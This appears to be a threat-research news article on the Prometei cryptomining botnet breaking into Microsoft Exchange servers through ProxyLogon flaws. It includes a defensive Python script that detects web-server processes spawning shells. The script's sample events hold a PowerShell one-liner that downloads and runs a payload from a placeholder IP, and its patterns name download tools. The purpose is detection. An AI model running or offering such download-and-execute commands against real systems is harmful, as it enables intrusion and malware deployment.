Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines into a cryptocurrency botnet named Prometei, according to new research.
"Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more," Boston-based cybersecurity firm Cybereason said in an analysis summarizing its findings.
First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a wide range of specially crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, propagate laterally across the network and "increase the amount of systems participating in its Monero-mining pool."
"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network," Cybereason senior threat researcher Lior Rochberger said, adding that it is "built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns."
The intrusions take advantage of the recently patched vulnerabilities in Microsoft Exchange Servers with the goal of abusing the processing power of the Windows systems to mine Monero.
In the attack sequence observed by the firm, the adversary was found exploiting the Exchange Server flaws CVE-2021-27065 and CVE-2021-26858 as the initial compromise vector to install the China Chopper web shell and gain backdoor entry to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server.
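The chain described above (web shell on the Exchange server, then PowerShell fetching a payload) leaves a recognisable trace in process-creation telemetry: a shell spawned by the web server's worker process, often with a download command line. The following detection logic is an added example written for this article; it is not Cybereason's tooling or anything from the Prometei analysis. It assumes the Exchange front end runs under the IIS worker process `w3wp.exe` and works on constructed, Sysmon-style process-creation records embedded inline.

```python
# Added example (not from the article, Cybereason or Prometei): flag shells
# spawned by the web-server worker process and note download/encoded commands.
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (parent image, image, command line)."""
    parent_image: str
    image: str
    command_line: str


# Assumption: Exchange's IIS worker process is w3wp.exe; extend for other web servers.
WEB_SERVER_PARENTS = {"w3wp.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line fragments commonly used to pull remote content.
DOWNLOAD_PATTERN = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"start-bitstransfer|certutil)",
    re.IGNORECASE,
)
# PowerShell -e / -ec / -enc / -EncodedCommand switches.
ENCODED_PATTERN = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent):
    """Return a list of reasons the event is suspicious, or None if it is not."""
    parent = basename(event.parent_image)
    child = basename(event.image)
    if parent not in WEB_SERVER_PARENTS or child not in SHELL_CHILDREN:
        return None
    reasons = ["web-server worker process spawned a shell"]
    if DOWNLOAD_PATTERN.search(event.command_line):
        reasons.append("command line downloads remote content")
    if ENCODED_PATTERN.search(event.command_line):
        reasons.append("encoded PowerShell command")
    return reasons


def scan(events):
    """Return (index, reasons) for every event classify() considers suspicious."""
    hits = []
    for index, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed sample events; the host and IP are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\System32\inetsrv\w3wp.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -nop -w hidden IEX (New-Object Net.WebClient)"
        ".DownloadString('http://198.51.100.7/payload')",
    ),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe Get-ChildItem C:\\Users",
    ),
    ProcessEvent(
        r"C:\Windows\System32\inetsrv\w3wp.exe",
        r"C:\Windows\System32\cmd.exe",
        "cmd.exe /c whoami",
    ),
    ProcessEvent(
        r"C:\Windows\System32\inetsrv\w3wp.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    ),
]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        event = SAMPLE_EVENTS[index]
        print(f"[{index}] {basename(event.parent_image)} -> {basename(event.image)}: "
              + "; ".join(reasons))
```

In production the records would come from Sysmon Event ID 1 or EDR process telemetry rather than an inline list; the point is that a web-server worker process should essentially never spawn a shell, so that parent/child pairing alone is a high-signal alert on an Exchange host, with the download and encoded-command checks adding context for triage.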
Recent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including a new module called "Microsoft Exchange Defender" that masquerades as a legitimate Microsoft product and likely takes care of removing other, competing web shells that may be installed on the machine, so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.
Interestingly, newly unearthed evidence gathered from VirusTotal artifacts has revealed that the botnet may have been around as early as May 2016, implying that the malware has been constantly evolving ever since, adding new modules and techniques to its capabilities.
Prometei has been observed in a multitude of victims spanning the finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former Soviet bloc countries.
Not much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set to "Russian." A separate Tor client module used to communicate with a Tor C2 server included a configuration file that is set up to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.
"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve the efficiency of their operations," Rochberger said. "As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks."
"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints," she added.